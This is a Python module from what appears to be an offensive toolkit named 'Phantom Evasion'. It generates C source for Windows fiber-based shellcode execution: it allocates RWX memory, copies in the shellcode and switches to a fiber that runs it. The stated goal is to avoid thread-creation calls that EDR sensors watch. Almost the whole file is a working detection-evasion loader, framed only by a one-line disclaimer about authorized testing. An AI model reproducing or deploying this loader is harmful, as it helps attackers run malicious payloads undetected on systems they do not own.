"""
Phantom Evasion - Fiber-Based Shellcode Injection

LEGAL DISCLAIMER:
For authorized penetration testing and security research ONLY.
Users must have explicit written permission from the target system owner.
"""

from typing import Dict, Any


def generate_fiber_injection() -> Dict[str, Any]:
    """Generate C code for fiber-based shellcode execution.

    Steps:
        1. Allocate RWX memory and copy shellcode into it.
        2. Convert the current thread to a fiber (``ConvertThreadToFiber``).
        3. Create a new fiber pointing at the shellcode (``CreateFiber``).
        4. Switch to the shellcode fiber (``SwitchToFiber``).
        5. After the shellcode fiber returns, switch back and clean up.

    This avoids ``CreateRemoteThread`` / ``NtCreateThreadEx`` calls that
    are commonly monitored by EDR sensors.

    Returns:
        Dict with keys ``code``, ``description``, ``layer``, ``name``.
    """
    code = r"""\
// Fiber-Based Shellcode Injection – generated by Phantom Evasion
// Layer 4 – Behavioral Evasion
// Executes shellcode via Windows Fibers to avoid thread-creation telemetry.

#include <windows.h>

// Fiber parameter block passed between fibers
typedef struct _FIBER_PARAM {
    LPVOID  main_fiber;     // The original thread fiber (to return to)
    LPVOID  shellcode_mem;  // RWX shellcode allocation
} FIBER_PARAM;

/**
 * Fiber entry point – called by SwitchToFiber().
 * Executes shellcode then switches back to the main fiber.
 */
static VOID WINAPI shellcode_fiber_fn(LPVOID param) {
    FIBER_PARAM *fp = (FIBER_PARAM *)param;
    // Cast and call shellcode
    ((void(*)())fp->shellcode_mem)();
    // Return control to the main fiber
    SwitchToFiber(fp->main_fiber);
}

/**
 * Allocate memory, write shellcode, execute via a fiber switch.
 *
 * @param shellcode     Pointer to raw shellcode bytes.
 * @param shellcode_len Length of shellcode in bytes.
 * @return TRUE on success, FALSE on failure.
 */
static BOOL fiber_inject(unsigned char *shellcode, size_t shellcode_len) {
    // Allocate RWX memory for shellcode in the current process
    LPVOID mem = VirtualAlloc(NULL, shellcode_len,
                              MEM_COMMIT | MEM_RESERVE,
                              PAGE_EXECUTE_READWRITE);
    if (!mem) return FALSE;

    // Copy shellcode
    memcpy(mem, shellcode, shellcode_len);

    // Convert the calling thread into a fiber so we can switch away from it
    LPVOID main_fiber = ConvertThreadToFiber(NULL);
    if (!main_fiber) {
        VirtualFree(mem, 0, MEM_RELEASE);
        return FALSE;
    }

    FIBER_PARAM fp = { .main_fiber = main_fiber, .shellcode_mem = mem };

    // Create a new fiber that will run our shellcode
    LPVOID sc_fiber = CreateFiber(0, shellcode_fiber_fn, &fp);
    if (!sc_fiber) {
        VirtualFree(mem, 0, MEM_RELEASE);
        return FALSE;
    }

    // Switch to the shellcode fiber – execution resumes here after it returns
    SwitchToFiber(sc_fiber);

    // Cleanup
    DeleteFiber(sc_fiber);
    VirtualFree(mem, 0, MEM_RELEASE);
    return TRUE;
}
"""

    return {
        "code": code,
        "description": (
            "Fiber injection: ConvertThreadToFiber + CreateFiber + SwitchToFiber "
            "to execute shellcode without CreateThread/NtCreateThreadEx"
        ),
        "layer": "Layer 4 - Behavioral Evasion",
        "name": "fiber_injection",
    }
